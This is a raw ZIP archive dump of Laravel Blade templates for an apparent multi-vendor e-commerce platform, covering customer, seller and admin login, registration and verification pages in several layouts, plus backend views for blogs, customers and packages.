@endif @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_mail_verification') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_mail_verification') == 1) @endif @endsection PK�N]�*k  5views/auth/boxed/seller_verify_confirmation.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if($sellerVerification->email != null)
@else
@endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection PK�N]�$7�B�B%views/auth/boxed/user_login.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Customer Login Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Welcome Back !')}}

{{ translate('Login to your account')}}
@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif
@if (env("DEMO_MODE") == "On")
{{ translate('Customer Account')}}
@endif @if(get_setting('google_login') == 1 || get_setting('facebook_login') == 1 || get_setting('twitter_login') == 1 || get_setting('apple_login') == 1)
{{ translate('Or Login With')}}
@endif

{{ translate('Dont have an account?')}} {{ translate('Register Now')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_login') == 1) @endif @endsectionPK�N]xu/V[[,views/auth/boxed/user_registration.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Customer Register Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Create an account')}}

@csrf
@if ($errors->has('name')) {{ $errors->first('name') }} @endif
@if (addon_is_activated('otp_system'))
{{-- Show both fields with the toggle button if neither email nor phone is set --}}
@if(get_setting('customer_registration_verify') == '1') @endif
{{-- Default to 'US' --}}
@error('otp') {{ $message }} @enderror
@else {{-- If OTP system is disabled, show only the email field --}}
@error('otp') {{ $message }} @enderror
@endif
{{ translate('Password must contain at least 6 digits') }}
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_register') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
@if(get_setting('google_login') == 1 || get_setting('facebook_login') == 1 || get_setting('twitter_login') == 1 || get_setting('apple_login') == 1)
{{ translate('Or Join With')}}
@endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_register') == 1) @endif @include('auth.verifyEmailOrPhone') @endsectionPK�N]�~( ( 'views/auth/boxed/verify_email.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Password Reset Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Verify Your Email Address') }}

{{ translate('Before proceeding, please check your email for a verification link. If you did not receive the email.') }}
{{ translate('Click here to request another') }} @if (session('resent')) @endif
@endsectionPK�N]�4-�ii(views/auth/focused/admin_login.blade.phpnu�[���
{{ translate('Site Icon')}}

{{ translate('Welcome to') }} {{ env('APP_NAME') }}

{{ translate('Login to your account')}}
@csrf
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_admin_login') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
@if (env("DEMO_MODE") == "On")
[email protected] 123456
@endif
PK�N]ѽ�:##6views/auth/focused/customer_reg_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_mail_verification') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_mail_verification') == 1) @endif @endsection PK�N]��J9views/auth/focused/customer_verify_confirmation.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if($customerVerification->email != null)
@else
@endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection PK�N]R�a��,views/auth/focused/forgot_password.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Forgot Password Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Forgot password?') }}

{{ addon_is_activated('otp_system') ? translate('Enter your email address or phone number to recover your password.') : translate('Enter your email address to recover your password.') }}
@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_forgot_password') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
{{ translate('Back to Previous Page')}}
@endsectionPK�N]Y.� ##-views/auth/focused/reg_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_mail_verification') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_mail_verification') == 1) @endif @endsection PK�N]1�#d+views/auth/focused/reset_password.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Password Reset Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Reset Password') }}

{{ translate('Enter your email address and new password and confirm password.') }}
@csrf
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if ($errors->has('code')) {{ $errors->first('code') }} @endif
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
{{ translate('Back to Previous Page')}}
@endsectionPK�N]�h�'')views/auth/focused/seller_login.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Site Icon')}}

{{ translate('Welcome Back !')}}

{{ translate('Login To Your Seller Account')}}
@csrf
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_login') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
@if (env("DEMO_MODE") == "On")
{{ translate('Seller Account')}}
@endif

{{ translate('Dont have an account?')}} {{ translate('Register Now')}}

{{ translate('Back to Previous Page')}}
@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_login') == 1) @endif @endsectionPK�N]�e�.�.0views/auth/focused/seller_registration.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Site Icon')}}

{{ translate('Register your shop')}}

@csrf
{{ translate('Personal Info')}}
@if ($errors->has('name')) {{ $errors->first('name') }} @endif
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if ($errors->has('phone')) {{ $errors->first('phone') }} @endif
{{ translate('Password must contain at least 6 digits') }}
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
{{ translate('Basic Info')}}
@if ($errors->has('shop_name')) {{ $errors->first('shop_name') }} @endif
@if ($errors->has('address')) {{ $errors->first('address') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_register') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

{{ translate('Back to Previous Page')}}
@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_register') == 1) @endif @endsectionPK�N]a�:�"�"4views/auth/focused/seller_reg_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_mail_verification') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_mail_verification') == 1) @endif @endsection PK�N]�*k  7views/auth/focused/seller_verify_confirmation.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if($sellerVerification->email != null)
@else
@endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection PK�N]��m]�?�?'views/auth/focused/user_login.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Site Icon')}}

{{ translate('Welcome Back !')}}

{{ translate('Login to your account')}}
@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif
@if (env("DEMO_MODE") == "On")
{{ translate('Customer Account')}}
@endif @if(get_setting('google_login') == 1 || get_setting('facebook_login') == 1 || get_setting('twitter_login') == 1 || get_setting('apple_login') == 1)
{{ translate('Or Login With')}}
@endif

{{ translate('Dont have an account?')}} {{ translate('Register Now')}}

{{ translate('Back to Previous Page')}}
@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_login') == 1) @endif @endsectionPK�N]��� YY.views/auth/focused/user_registration.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Site Icon')}}

{{ translate('Create an account')}}

@csrf
@if ($errors->has('name')) {{ $errors->first('name') }} @endif
@if (addon_is_activated('otp_system'))
{{-- Show both fields with the toggle button if neither email nor phone is set --}}
@if(get_setting('customer_registration_verify') == '1') @endif
{{-- Default to 'US' --}}
@error('otp') {{ $message }} @enderror
@else {{-- If OTP system is disabled, show only the email field --}}
@error('otp') {{ $message }} @enderror
@endif
{{ translate('Password must contain at least 6 digits') }}
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_register') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
@if(get_setting('google_login') == 1 || get_setting('facebook_login') == 1 || get_setting('twitter_login') == 1 || get_setting('apple_login') == 1)
{{ translate('Or Join With')}}
@endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

{{ translate('Back to Previous Page')}}
@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_register') == 1) @endif @include('auth.verifyEmailOrPhone') @endsectionPK�N]ѐcل � )views/auth/focused/verify_email.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Password Reset Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Verify Your Email Address') }}

{{ translate('Before proceeding, please check your email for a verification link. If you did not receive the email.') }}
{{ translate('Click here to request another') }} @if (session('resent')) @endif
{{ translate('Back to Previous Page')}}
@endsectionPK�N]22��%views/auth/free/admin_login.blade.phpnu�[���
{{ translate('Site Icon')}}

{{ translate('Welcome to') }} {{ env('APP_NAME') }}

{{ translate('Login to your account')}}
@csrf
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_admin_login') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
@if (env("DEMO_MODE") == "On")
[email protected] 123456
@endif
PK�N]��B ##3views/auth/free/customer_reg_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_mail_verification') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_mail_verification') == 1) @endif @endsectionPK�N]<_b���6views/auth/free/customer_verify_confirmation.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if($customerVerification->email != null)
@else
@endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsectionPK�N]�V*}})views/auth/free/forgot_password.blade.phpnu�[���
{{ translate('Forgot Password Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Forgot password?') }}

{{ addon_is_activated('otp_system') ? translate('Enter your email address or phone number to recover your password.') : translate('Enter your email address to recover your password.') }}
@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_forgot_password') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
{{ translate('Back to Previous Page')}}
PK�N]c5�W##*views/auth/free/reg_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_mail_verification') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_mail_verification') == 1) @endif @endsection PK�N]���gHH(views/auth/free/reset_password.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Password Reset Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Reset Password') }}

{{ translate('Enter your email address and new password and confirm password.') }}
@csrf
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if ($errors->has('code')) {{ $errors->first('code') }} @endif
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
{{ translate('Back to Previous Page')}}
@endsectionPK�N]�89�(�(&views/auth/free/seller_login.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Site Icon')}}

{{ translate('Welcome Back !')}}

{{ translate('Login To Your Seller Account')}}
@csrf
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_login') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
@if (env("DEMO_MODE") == "On")
{{ translate('Seller Account')}}
@endif

{{ translate('Dont have an account?')}} {{ translate('Register Now')}}

{{ translate('Back to Previous Page')}}
@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_login') == 1) @endif @endsectionPK�N]�-� 1 1-views/auth/free/seller_registration.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Site Icon')}}

{{ translate('Register your shop')}}

@csrf
{{ translate('Personal Info')}}
@if ($errors->has('name')) {{ $errors->first('name') }} @endif
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@if ($errors->has('phone')) {{ $errors->first('phone') }} @endif
{{ translate('Password must contain at least 6 digits') }}
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
{{ translate('Basic Info')}}
@if ($errors->has('shop_name')) {{ $errors->first('shop_name') }} @endif
@if ($errors->has('address')) {{ $errors->first('address') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_seller_register') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

{{ translate('Back to Previous Page')}}
@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_register') == 1) @endif @endsectionPK�N]͒�%%1views/auth/free/seller_reg_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection PK�N]�*k  4views/auth/free/seller_verify_confirmation.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @php $isOtpSystemActivated = addon_is_activated('otp_system'); @endphp
{{ translate('Site Icon')}}

{{ !$isOtpSystemActivated ? translate('Verify Your Email') : translate('Verify Your Email/Phone') }}

@csrf @if($sellerVerification->email != null)
@else
@endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

@endsection PK�N]���A�A$views/auth/free/user_login.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Site Icon')}}

{{ translate('Welcome Back !')}}

{{ translate('Login to your account')}}
@csrf @if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif
@if (env("DEMO_MODE") == "On")
{{ translate('Customer Account')}}
@endif @if(get_setting('google_login') == 1 || get_setting('facebook_login') == 1 || get_setting('twitter_login') == 1 || get_setting('apple_login') == 1)
{{ translate('Or Login With')}}
@endif

{{ translate('Dont have an account?')}} {{ translate('Register Now')}} {{ translate('Back to Previous Page')}}

@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_login') == 1) @endif @endsectionPK�N]Z�8�ZZ+views/auth/free/user_registration.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Site Icon')}}

{{ translate('Create an account')}}

@csrf
@if ($errors->has('name')) {{ $errors->first('name') }} @endif
@if (addon_is_activated('otp_system'))
{{-- Show both fields with the toggle button if neither email nor phone is set --}}
@if(get_setting('customer_registration_verify') == '1') @endif
@error('otp') {{ $message }} @enderror
@else {{-- If OTP system is disabled, show only the email field --}}
@error('otp') {{ $message }} @enderror
@endif
{{ translate('Password must contain at least 6 digits') }}
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
@if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_register') == 1) @if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif @endif
@if(get_setting('google_login') == 1 || get_setting('facebook_login') == 1 || get_setting('twitter_login') == 1 || get_setting('apple_login') == 1)
{{ translate('Or Join With')}}
@endif

{{ translate('Already have an account?')}} {{ translate('Log In')}}

{{ translate('Back to Previous Page')}}
@endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_customer_register') == 1) @endif @include('auth.verifyEmailOrPhone') @endsection PK�N]�\�% % &views/auth/free/verify_email.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
{{ translate('Password Reset Page Image') }}
{{ translate('Site Icon')}}

{{ translate('Verify Your Email Address') }}

{{ translate('Before proceeding, please check your email for a verification link. If you did not receive the email.') }}
{{ translate('Click here to request another') }} @if (session('resent')) @endif
{{ translate('Back to Previous Page')}}
@endsectionPK�N]���o��+views/auth/layouts/authentication.blade.phpnu�[��� @php $rtl = get_session_language()->rtl; @endphp @if ($rtl == 1) @else @endif @yield('meta_title', get_setting('website_name') . ' | ' . get_setting('site_motto')) @php $site_icon = uploaded_asset(get_setting('site_icon')); @endphp @if ($rtl == 1) @endif @yield('css') @yield('content') @include('auth.login_register_js') @yield('script') PK�N]s{F�NNviews/auth/login.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @include('auth.'.get_setting('authentication_layout_select').'.admin_login') @endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_admin_login') == 1) @endif @endsection PK�N]PQ��&views/auth/login_register_js.blade.phpnu�[��� @if (addon_is_activated('otp_system')) @endif PK�N]cw N$views/auth/passwords/email.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content') @include('auth.'.get_setting('authentication_layout_select').'.forgot_password') @endsection @section('script') @if(get_setting('google_recaptcha') == 1 && get_setting('recaptcha_forgot_password') == 1) @endif @endsection PK�N]���ttviews/auth/register.blade.phpnu�[���@extends('backend.layouts.blank') @section('content')
{{ translate('Create a New Account') }}
@csrf
@if ($errors->has('name')) {{ $errors->first('name') }} @endif
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
{{translate('Already have an account')}} ? {{translate('Sign In')}}
@endsectionPK�N]���JJ'views/auth/verifyEmailOrPhone.blade.phpnu�[���PK�N]��L�/ / %views/backend/addons/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{ translate('Install/Update Addon')}}
@csrf
@endsection PK�N]ʈ�X'X'$views/backend/addons/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{-- --}}

    @forelse($addons as $key => $addon)
  • Image

    {{ ucfirst($addon->name) }}

    {{ translate('Version')}}: {{ $addon->version }}

    @if (env('DEMO_MODE') != 'On')

    {{ translate('Purchase code')}}: {{ $addon->purchase_code }}

    @endif
  • @empty
  • Image
    {{ translate('No Addon Installed')}}
  • @endforelse
@endsection @section('script') @endsection PK�N]�T��� � +views/backend/admin_profile/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{translate('Profile')}}
@csrf
{{ translate('Browse')}}
{{ translate('Choose File') }}
@endsection PK�N],���oo/views/backend/blog_system/blog/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{translate('Blog Information')}}
@csrf
{{ translate('Browse')}}
{{ translate('Choose File') }}
{{ translate('Browse')}}
{{ translate('Choose File') }}
@endsection @section('script') @endsection PK�N]�W_� � -views/backend/blog_system/blog/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{translate('Blog Information')}}
@csrf @method('PATCH')
{{ translate('Browse')}}
{{ translate('Choose File') }}
{{ translate('Browse')}}
{{ translate('Choose File') }}
@endsection @section('script') @endsection PK�N]�����.views/backend/blog_system/blog/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

{{translate('All Posts')}}

@can('add_blog') @endcan

{{ translate('All blog posts') }}
@if(addon_is_activated('portfolio_system')) @endif @foreach($blogs as $key => $blog) @if(addon_is_activated('portfolio_system')) @endif @endforeach
# {{translate('Title')}} {{translate('Category')}} {{translate('Short Description')}}{{translate('News')}} {{translate('Event')}} {{translate('Going On')}}{{translate('Status')}} {{translate('Options')}}
{{ ($key+1) + ($blogs->currentPage() - 1) * $blogs->perPage() }} {{ $blog->title }} @if($blog->category != null) {{ $blog->category->category_name }} @else -- @endif {{ $blog->short_description }} @can('edit_blog') @endcan @can('delete_blog') @endcan
{{ $blogs->appends(request()->input())->links() }}
@endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]�\��3views/backend/blog_system/category/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{translate('Blog Category Information')}}
@csrf
@endsection PK�N]=�1QKK1views/backend/blog_system/category/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{translate('Blog Category Information')}}
@csrf @method('PATCH')
@endsection PK�N]Cl"�} } 2views/backend/blog_system/category/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

{{translate('All Blog Categories')}}

@can('add_blog_category') @endcan
{{ translate('Blog Categories') }}
@foreach($categories as $key => $category) @endforeach
# {{translate('Name')}} {{translate('Options')}}
{{ ($key+1) + ($categories->currentPage() - 1)*$categories->perPage() }} {{ $category->category_name }} @can('edit_blog_category') @endcan @can('delete_blog_category') @endcan
{{ $categories->appends(request()->input())->links() }}
@endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]����:views/backend/customer/classified_products/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{translate('Classified Products')}}
@foreach($products as $key => $product) @endforeach
# {{translate('Name')}} {{translate('Image')}} {{translate('Uploaded By')}} {{translate('Customer Status')}} {{translate('Published')}} {{translate('Options')}}
{{ ($key+1) + ($products->currentPage() - 1)*$products->perPage() }} {{$product->getTranslation('name')}} {{translate('Product Image')}} {{$product->added_by}} @if ($product->status == 1) {{ translate('PUBLISHED') }} @else {{ translate('UNPUBLISHED') }} @endif @can('delete_classified_product') @endcan
{{ $products->links() }}
@endsection @section('modal') @include('modals.delete_modal') @endsection @section('script') @endsection PK�N]�����1views/backend/customer/customers/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @if (env('MAIL_USERNAME') == null && env('MAIL_PASSWORD') == null)
{{ translate('You need to configure SMTP correctly to to add Customer by email.') }} {{ translate('Configure Now') }}
@endif
{{translate('Customer Information')}}
@csrf
@if ($errors->has('name')) {{ $errors->first('name') }} @endif
@if (addon_is_activated('otp_system'))
@else
@if ($errors->has('email')) {{ $errors->first('email') }} @endif
@endif {{--
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
--}}
@endsection @section('script') @endsection PK�N]sWX�"C"C0views/backend/customer/customers/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

{{ translate('All Customers') }}

{{ translate('This color indicates that the customer is marked as blocked.') }}
{{ translate('This color indicates that the customer is marked as suspicious.') }}

@can('add_customer') {{ translate('Add New Customer') }} @endif
@endsection @section('modal')
@endsection @section('script') @endsection PK�N]�)��Q�Q0views/backend/customer/customers/table.blade.phpnu�[���
@if (auth()->user()->can('customer_delete')) @else @endif @canany(['ban_customer','delete_customer']) @endcanany @forelse ($customers as $key => $customer) @canany(['delete_customer','ban_customer']) @endcanany @empty @endforelse
# {{ translate('Name') }} {{ translate('Email Address') }} {{ translate('Phone') }} {{ translate('Package') }} {{ translate('Wallet Balance') }} {{ translate('Verification Status') }} {{ translate('Options') }}
@if (auth()->user()->can('customer_delete'))
@else
{{ $key + 1 + ($customers->currentPage() - 1) * $customers->perPage() }}
@endif
@if($customer->banned == 1) @elseif($customer->is_suspicious == 1) @endif {{$customer->name}}
{{ $customer->email}}
{{ $customer->phone}}
@if ($customer->customer_package != null) {{$customer->customer_package->getTranslation('name')}} @endif
{{single_price($customer->balance)}}
@if($customer->email_verified_at != null) {{translate('Verified')}} @else {{translate('Unverified')}} @endif
{{ translate('No Data found!') }}
{{ $customers->appends(request()->input())->links() }}
PK�N]��<!!9views/backend/customer/customer_packages/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{translate('Create New Package')}}
@if ($errors->any())
    @foreach ($errors->all() as $error)
  • {{ $error }}
  • @endforeach
@endif
@csrf
{{ translate('Browse')}}
{{ translate('Choose File') }}
@endsection PK�N]�^���7views/backend/customer/customer_packages/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

{{translate('Update Package Information')}}

@if ($errors->any())
    @foreach ($errors->all() as $error)
  • {{ $error }}
  • @endforeach
@endif
@csrf
{{ translate('Browse')}}
{{ translate('Choose File') }}
@endsection PK�N]����VV8views/backend/customer/customer_packages/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

{{translate('All Classifies Packages')}}

@can('add_classified_package') @endcan
@foreach ($customer_packages as $key => $customer_package)
{{ translate('Package Logo')}}

{{$customer_package->getTranslation('name')}}

{{single_price($customer_package->amount)}}

{{translate('Product Upload') }}: {{$customer_package->product_upload}}

@can('edit_classified_package') {{translate('Edit')}} @endcan @can('delete_classified_package') {{translate('Delete')}} @endcan
@endforeach
@endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]��ROO.views/backend/dashboard/dashboard_js.blade.phpnu�[���PK�N]#��''4views/backend/dashboard/inhouse_top_brands.blade.phpnu�[���@foreach ($inhouse_top_brands as $inhouse_top_brand)
{{ translate('brand') }}

@php $lang = App::getLocale(); $brand = App\Models\BrandTranslation::where('brand_id', $inhouse_top_brand->id) ->where('lang', $lang) ->first(); @endphp {{ $brand ? $brand->name : translate('Not Found') }}

{{ single_price($inhouse_top_brand->total) }}

@endforeach PK�N]�1��668views/backend/dashboard/inhouse_top_categories.blade.phpnu�[���@foreach ($inhouse_top_categories as $inhouse_top_category)
{{ translate('category') }}

